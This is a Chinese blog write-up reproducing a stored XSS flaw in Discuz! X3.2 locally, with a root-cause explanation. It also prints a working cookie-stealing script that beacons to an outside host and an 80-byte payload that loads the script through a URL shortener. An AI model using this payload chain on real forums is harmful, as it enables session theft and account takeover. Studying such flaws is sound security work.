Discuz! X3.2 存储型xss漏洞的本地复现和深入利用

前言

新的一年马上就开始了,新年打算研究点新的技术方向。由于经常被朋友拉着问,你会不会盗取qq,会不会投票作弊,每次尴尬的说不会时,总感觉自己的无用。
于是 web安全就作为2018年的研究计划吧。

这里写出第一篇漏洞文章。作为一个入门的开端。

参考

本文所提及的漏洞只是我的一个本地复现和更深入的利用。
漏洞来源参考如下文章,感谢作者的提供。
http://www.91ri.org/17317.html

概念说明

  • discuz 国内开源的论坛程序。
  • xss漏洞 常见的web的漏洞一种。分为三类。其中存储型危害最大。
  • cookie 网址通过cookie记录用户的状态。无需密码即可登录。

漏洞证明

image.png

漏洞的复现步骤

1、本地搭建discuz3.2
2、后台开启首页四格


image.png

3、注册账号发帖。标题 输入

<img src=1 onerror=alert(1) > 

4、进入首页,鼠标指向首页四格上刚刚发的帖子。即可复现。

漏洞的原因

1、查看源码

image.png
image.png

2、鼠标指向的时候会触发 showTip(); 这个函数会读取 当前元素的tip属性值。也就是会加载 <img src=1 onerror=alert(1) >
3、由于src=1不存在,则会执行 onerror 事件。最终形成xss。

4、更深入的原因是:我们输入的内容是

&#0060;img src=1 onerror=alert(1) &#0062; 

dz程序在存储的时候也进行了适当的转义。但是 showTip()的内部,调用了 getAttribute函数,该函数 会将属性值解码。导致产生如下代码。

<img src=1 onerror=alert(1) >

最终xss得以产生。

漏洞的解决。

对用户的输入进行更强的过滤。

漏洞的限制以及如何突破

  • 需要开启首页四格。
    无法突破。。但是开启首页四格的网站非常多,所以也不算大的限制。
  • 标题存储内容长度限制,80个字节。
    该问题导致利用的代码不能直接写入标题,否则无法完成复杂逻辑。可以通过动态加载外部js文件来实现。

突破标题的长度限制

  • 编写js文件。
console.log("代码执行");
Date.prototype.Format = function (fmt) { //author: meizz
    var o = {
        "M+": this.getMonth() + 1, //月份
        "d+": this.getDate(), //日
        "h+": this.getHours(), //小时
        "m+": this.getMinutes(), //分
        "s+": this.getSeconds(), //秒
        "q+": Math.floor((this.getMonth() + 3) / 3), //季度
        "S": this.getMilliseconds() //毫秒
    };
    if (/(y+)/.test(fmt)) fmt = fmt.replace(RegExp.$1, (this.getFullYear() + "").substr(4 - RegExp.$1.length));
    for (var k in o)
    if (new RegExp("(" + k + ")").test(fmt)) fmt = fmt.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
    return fmt;
}

var cookie = document.cookie;
var ele = document.createElement("img"); //创建img标签
var time = new  Date().Format("yyyy-MM-dd HH:mm:ss");
ele.src = "http://666coder.aoyait.test/index.html?cookie="+cookie+"&location="+window.location.href+"&time="+time;  //cookie获取
ele.id = "imgs";

以上js 执行的逻辑是:获取用户访问的地址+时间+cookie .然后发送给远程服务器。666coder.aoyait.test

  • 压缩js的url长度。这里只能使用 新浪的网址缩短服务。因为它的最短。是t.cn
  • 利用代码。长度正好80 (谢天谢地)
&#0060;img src=1 onerror=appendscript(&#0034;http://t.cn/RHJpOh7&#0034;)&#x003E;

这里的appendscript() 是discuz 本身提供的函数。没有它,也无法缩短长度。


function appendscript(src, text, reload, charset) {
    var id = hash(src + text);
    if(!reload && in_array(id, evalscripts)) return;
    if(reload && $('#' + id)[0]) {
        $('#' + id)[0].parentNode.removeChild($('#' + id)[0]);
    }

    evalscripts.push(id);
    var scriptNode = document.createElement("script");
    scriptNode.type = "text/javascript";
    scriptNode.id = id;
    scriptNode.charset = charset ? charset : (!document.charset ? document.characterSet : document.charset);
    try {
        if(src) {
            scriptNode.src = src;
            scriptNode.onloadDone = false;
            scriptNode.onload = function () {
                scriptNode.onloadDone = true;
                JSLOADED[src] = 1;
            };
            scriptNode.onreadystatechange = function () {
                if((scriptNode.readyState == 'loaded' || scriptNode.readyState == 'complete') && !scriptNode.onloadDone) {
                    scriptNode.onloadDone = true;
                    JSLOADED[src] = 1;
                }
            };
        } else if(text){
            scriptNode.text = text;
        }
        document.getElementsByTagName('head')[0].appendChild(scriptNode);
    } catch(e) {}
}
  • 发帖子。进入首页,鼠标指向。触发漏洞利用代码执行。
image.png
  • 用户的cookie 被传递到 另外一台服务器。这里只通过nginx的access.log来记录数据了,可以编写脚本,存储到数据库,然后自动利用cookie进行登录等其他操作。
image.png

漏洞的后果

  • 账号被盗
  • 论坛帖子/用户被恶意删除
  • ......
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,951评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,606评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,601评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,478评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,565评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,587评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,590评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,337评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,785评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,096评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,273评论 1 344
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,935评论 5 339
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,578评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,199评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,440评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,163评论 2 366
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,133评论 2 352

推荐阅读更多精彩内容

  • HTTP cookie(也称为web cookie,网络cookie,浏览器cookie或者简称cookie)是网...
    留七七阅读 17,923评论 2 71
  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 172,008评论 25 707
  • 漏洞挖掘与利用 测试环境的搭建 引言 为什么要搭建本地测试环境?我想下面的东西能够回答你的疑惑。 第二百八十五条 ...
    作业没写完阅读 3,182评论 0 4
  • 今天尧宝早早的就困了,昨天晚上后半夜就没怎么睡好,我也很累,最近事情有点多,一点睡的觉基本一夜没怎么睡踏实。而尧宝...
    小梦化蝶阅读 208评论 0 0
  • 今天是加入日记星球的第一天,本来想好了许多话要说,想聊聊我跟瑜伽的缘分,兴奋的不知道怎么说了,等静下心来的时候,再...
    沐恩孕产瑜伽阅读 263评论 2 4